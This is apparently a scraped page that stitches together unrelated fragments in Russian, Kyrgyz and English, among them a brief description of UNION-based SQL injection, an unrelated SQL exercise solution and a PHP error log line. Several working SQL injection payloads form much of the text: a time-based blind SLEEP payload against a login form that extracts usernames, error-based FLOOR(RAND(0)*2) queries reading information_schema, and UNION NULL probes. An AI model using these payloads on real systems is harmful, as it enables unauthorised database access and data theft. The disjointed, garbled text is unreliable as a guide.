26 просм.1 ответ.0 голос. каалоо тилектер эки жашка. ... (select concat(0x48644c64,(select mid((select (elt(2836=2836,1))),1,10)),0x76497446)),null -- - ...
Основные методы эксплуатации SQL-injection. Union Based SQL-injection — применяется, если SQL-injection возникает в SELECT запросе. Благодаря данному методу можно объединить два SELECT запроса в один набор результатов.
(select concat(name,'(',substr(occupation,1,1),')') N from OCCUPATIONS) union (select concat('There are a total of ',count(occupation),' ',lower(occupation),'s.') from occupations group by occupation) order by N asc; Solution – 36.
Then try my all sql injection learning tricks.
Decoded: username=test' AND (SELECT 8156 FROM (SELECT(SLEEP(1-(IF(ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM Webapp.Users ORDER BY id LIMIT 4,1),6,1))>1,0,1)))))RKIU) AND 'FTfR'='FTfR&password=test&submit= Login.
AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT column_name FROM information_schema.columns LIMIT 1),FLOOR(RAND(0)*2))).
Оо 6 ветка, первый раз вижу version:6.0.10-alpha-community-log user: aos_new@localhost
and it error so much , ten minute get 1753 error all is it. 2015-10-13 12:10:41 - PHP Notice: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL...
1 AND(SELECT 1 FROM(SELECT COUNT(*),concat(0x3a,(SELECT column1 FROM database2.table1 LIMIT 0,1),FLOOR(rand(0)*2))x FROM information_schema.TABLES GROUP BY x)a)--. Inferential.